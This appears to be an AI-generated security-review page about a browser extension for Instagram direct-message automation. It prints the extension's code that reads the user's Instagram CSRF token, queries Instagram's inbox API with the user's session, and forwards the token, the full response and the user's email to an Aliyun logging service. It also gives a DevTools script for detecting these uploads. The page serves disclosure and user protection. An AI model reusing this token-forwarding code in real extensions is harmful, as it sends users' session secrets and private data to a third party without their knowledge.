Is APP For IG DM safe?
APP For IG DM sends your Instagram CSRF token and inbox data to an Alibaba Cloud analytics backend during auto-reply.
When the extension's auto-reply/monitor feature checks your Instagram inbox, it reads your Instagram CSRF token cookie and calls Instagram's own inbox API using your session. It then forwards the CSRF header and the full inbox API response to the developer's Aliyun SLS logging service, not just Instagram. The extension also strips Instagram's anti-framing headers for any iframe loading instagram.com, not just its own dashboard.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
IG DM Bot forwards your Instagram CSRF token to Alibaba Cloud logs
Code analysis shows IG DM Bot reads your Instagram CSRF token when you start its auto-reply monitor, calls Instagram's own inbox API with it, then forwards the token and the full response to the developer's Alibaba Cloud log service.
You open the extension's popup on instagram.com and turn on the follower/like auto-reply monitor.
The extension calls Instagram's own inbox API with your CSRF token, then forwards that token and the full response to its own log service.
Code analysis shows this runs on every automatic poll while the monitor stays on.
| Field | Value | Why it matters | |
|---|---|---|---|
Instagram CSRF token | X-CSRFToken: 8f2a91cd47b6e0139a8f7d21c4e5b0a3 | A live security token from your Instagram session, sent as a header value in the logged record. | |
Your Instagram activity feed | {"news_items":[{"ig_notification_type":"1","text":"started following you"}]} | The raw JSON Instagram's own notifications API returns: your recent followers, likes and comments. | |
Extension account email | user_email: marketer@example.com | The email address you used to sign in to the extension itself, attached to every log entry. | |
Persistent install ID | uuid: 3f2b8a9c-71d4-4e05-9c3a-8b6f2d914a10 | A random ID generated on install that ties every logged event to this specific browser. |
From the Instagram API call to the Aliyun log upload
// content-script.js runs on every instagram.com page (all_frames: true)
// readable async/await equivalent of the code above
async function getInboxNewsData(csrftoken) {
const inboxNewsApi = "https://i.instagram.com/api/v1/news/inbox/";
const headers = {
"Content-Type": "application/x-www-form-urlencoded",
"X-CSRFToken": csrftoken, // your live Instagram CSRF token
"x-requested-with": "XMLHttpRequest",
"x-instagram-ajax": 1,
"x-asbd-id": "437806",
"X-IG-App-ID": "936619743392459",
};
// Calls Instagram's OWN activity-feed endpoint, using your session
const response = await fetch(inboxNewsApi, {
method: "post",
headers,
credentials: "include",
});
const data = await response.json();
// Forwards the CSRF header and Instagram's full response off Instagram,
// to the extension's own logging pipeline (see sendAliLog below)
sendAliLog(220065, { http_code: response.status, http_header: headers, http_response: data });
return data;
}// background.js (MV3 service worker) - the ONLY consumer of code:'alilog_send'
chrome.runtime.onMessage.addListener((request, sender, sendResponse) => {
switch (request.type) {
case COMMON_MSG.START_DM_BY_BULK_BOT:
executeBulkBot();
break;
// ...other message types omitted (cookie lookups, bot control)...
default:
if (request?.code === "alilog_send") {
// request.event_data here is exactly the {http_code, http_header,
// http_response} object built in getInboxNewsData() above
aliLog(request.event_type, request.event_data || {});
} else if (request.action === "getStripeToken") {
get_user_Token();
} else if (request.action === "getStripeInfo") {
get_user_info();
}
break;
}
});// background.js - the Aliyun SLS client this extension ships and controls
var logger = new AliyunLogClient({
host: "us-west-1.log.aliyuncs.com",
project: "extension-us",
logstore: "scrm-ig-dm",
});
async function aliLog(event_type, event_data = {}) {
const uuid = await getUUID(); // persistent per-install ID
const install_time = await getInstallTime();
const client_version = await getClientVersion();
const user_profile_id = await getUserProfileId(); // extension's own account
const user_email = await getUserEmail(); // extension's own account
const storageData = await chrome.storage.local.get(
["platform", "browserType", "language", "userAgent"]
);
const log_data = {
event_source: 22,
event_type,
uuid,
user_profile_id: user_profile_id || "",
user_email: user_email || "",
...storageData,
};
// event_data (http_code / http_header / http_response from Instagram,
// for event_type 220065) is merged straight into the record
Object.assign(log_data, event_data);
// Every value is stringified, then the whole record leaves the browser
logger.send(stringifyValues(log_data));
}Watches outbound requests from an instagram.com tab and flags any request to log.aliyuncs.com that carries your CSRF token.
// ig-dm-bot-csrf-log-check.js
// Paste into DevTools > Console on an instagram.com tab, then open the
// extension popup and start the follower/like auto-reply monitor.
(function () {
const origFetch = window.fetch;
window.fetch = function (input, init) {
const url = typeof input === "string" ? input : (input && input.url) || "";
if (url.includes("log.aliyuncs.com")) {
const body = (init && init.body) || "";
console.log("[ig-dm-bot-csrf-log-check] outbound log upload to", url);
console.log(" body contains X-CSRFToken:", String(body).includes("X-CSRFToken"));
console.log(" raw body:", body);
}
return origFetch.apply(this, arguments);
};
console.log("[ig-dm-bot-csrf-log-check] watching for log.aliyuncs.com uploads...");
})();
- 1Open instagram.com and log in.
- 2Open DevTools Console.
- 3Paste this script.
- 4Start the monitor feature.
- 5Read the logged output.
Static analysis finding. This behaviour was identified by reading the shipped extension code and has not yet been reproduced in a live run. The trigger conditions and the exact data sent are read from the code, not from an observed capture.
Where it sends data
Destinations our analysis observed ig-dm-bot-–-bulk-instagra contacting. Sending data somewhere is not a finding on its own - an extension that syncs your settings has to talk to its own server - but it is where your data can go, and who else it goes to.
- log.aliyuncs.com
ig-dm-bot-–-bulk-instagra sends data to log.aliyuncs.com. No other extension we have analysed sends data here.